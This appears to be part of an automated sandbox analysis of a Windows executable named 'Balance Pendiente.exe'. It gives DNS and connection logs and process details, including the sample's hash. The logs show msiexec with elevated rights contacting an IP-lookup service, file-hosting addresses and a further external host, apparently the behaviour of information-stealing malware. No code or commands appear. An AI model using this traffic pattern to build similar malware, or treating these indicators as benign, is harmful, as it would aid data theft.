Feb 25, 2025 08:27:40.351269007 CET | 63088 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:40.358627081 CET | 53 | 63088 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:41.670273066 CET | 61048 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:41.689589977 CET | 53 | 61048 | 1.1.1.1 | 192.168.2.4 |
Feb 25, 2025 08:27:52.747853994 CET | 55731 | 53 | 192.168.2.4 | 1.1.1.1 |
Feb 25, 2025 08:27:52.755647898 CET | 53 | 55731 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 25, 2025 08:27:34.686697960 CET | 192.168.2.4 | 1.1.1.1 | 0xcbb | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:35.923798084 CET | 192.168.2.4 | 1.1.1.1 | 0x3027 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.351269007 CET | 192.168.2.4 | 1.1.1.1 | 0x88d9 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.670273066 CET | 192.168.2.4 | 1.1.1.1 | 0x2e5a | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:52.747853994 CET | 192.168.2.4 | 1.1.1.1 | 0x4e23 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 25, 2025 08:27:34.693865061 CET | 1.1.1.1 | 192.168.2.4 | 0xcbb | No error (0) | | | 172.217.18.14 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:35.931056023 CET | 1.1.1.1 | 192.168.2.4 | 0x3027 | No error (0) | | | 142.250.185.193 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.96.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.112.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.16.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.64.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.32.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.80.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | | | 104.21.48.1 | A (IP address) | IN (0x0001) | false |
Feb 25, 2025 08:27:52.755647898 CET | 1.1.1.1 | 192.168.2.4 | 0x4e23 | No error (0) | | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49812 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:40.377614021 CET | 151 | OUT | |
Feb 25, 2025 08:27:40.949151993 CET | 321 | IN | |
Feb 25, 2025 08:27:40.973191023 CET | 127 | OUT | |
Feb 25, 2025 08:27:41.130731106 CET | 321 | IN | |
Feb 25, 2025 08:27:42.383109093 CET | 127 | OUT | |
Feb 25, 2025 08:27:42.539824009 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49830 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:43.175154924 CET | 127 | OUT | |
Feb 25, 2025 08:27:43.748409033 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49842 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:44.384087086 CET | 151 | OUT | |
Feb 25, 2025 08:27:44.989926100 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49851 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:45.617341042 CET | 151 | OUT | |
Feb 25, 2025 08:27:46.190720081 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49860 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:46.823997021 CET | 151 | OUT | |
Feb 25, 2025 08:27:47.759228945 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49870 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:48.403321981 CET | 151 | OUT | |
Feb 25, 2025 08:27:48.987392902 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49881 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:49.625124931 CET | 151 | OUT | |
Feb 25, 2025 08:27:50.713785887 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49893 | 158.101.44.242 | 80 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Feb 25, 2025 08:27:51.374267101 CET | 151 | OUT | |
Feb 25, 2025 08:27:51.957364082 CET | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49770 | 172.217.18.14 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:35 UTC | 216 | OUT | |
2025-02-25 07:27:35 UTC | 1610 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49781 | 142.250.185.193 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:36 UTC | 258 | OUT | |
2025-02-25 07:27:39 UTC | 5014 | IN | |
2025-02-25 07:27:39 UTC | 5014 | IN | |
2025-02-25 07:27:39 UTC | 4672 | IN | |
2025-02-25 07:27:39 UTC | 1321 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN | |
2025-02-25 07:27:39 UTC | 1390 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49818 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:42 UTC | 85 | OUT | |
2025-02-25 07:27:42 UTC | 858 | IN | |
2025-02-25 07:27:42 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49828 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:43 UTC | 61 | OUT | |
2025-02-25 07:27:43 UTC | 850 | IN | |
2025-02-25 07:27:43 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49836 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:44 UTC | 85 | OUT | |
2025-02-25 07:27:44 UTC | 860 | IN | |
2025-02-25 07:27:44 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49848 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:45 UTC | 61 | OUT | |
2025-02-25 07:27:45 UTC | 852 | IN | |
2025-02-25 07:27:45 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49855 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:46 UTC | 61 | OUT | |
2025-02-25 07:27:46 UTC | 856 | IN | |
2025-02-25 07:27:46 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49865 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:48 UTC | 85 | OUT | |
2025-02-25 07:27:48 UTC | 856 | IN | |
2025-02-25 07:27:48 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49875 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:49 UTC | 85 | OUT | |
2025-02-25 07:27:49 UTC | 856 | IN | |
2025-02-25 07:27:49 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49887 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:51 UTC | 85 | OUT | |
2025-02-25 07:27:51 UTC | 856 | IN | |
2025-02-25 07:27:51 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49899 | 104.21.96.1 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:52 UTC | 85 | OUT | |
2025-02-25 07:27:52 UTC | 854 | IN | |
2025-02-25 07:27:52 UTC | 362 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.4 | 49905 | 149.154.167.220 | 443 | 5660 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-02-25 07:27:53 UTC | 349 | OUT | |
2025-02-25 07:27:53 UTC | 344 | IN | |
2025-02-25 07:27:53 UTC | 55 | IN |
Target ID: | 0 |
Start time: | 02:26:35 |
Start date: | 25/02/2025 |
Path: | C:\Users\user\Desktop\Balance Pendiente.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 507'280 bytes |
MD5 hash: | E70E71A31781B44F850A39693784CE74 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:26:37 |
Start date: | 25/02/2025 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xbd0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:26:37 |
Start date: | 25/02/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:27:19 |
Start date: | 25/02/2025 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8e0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |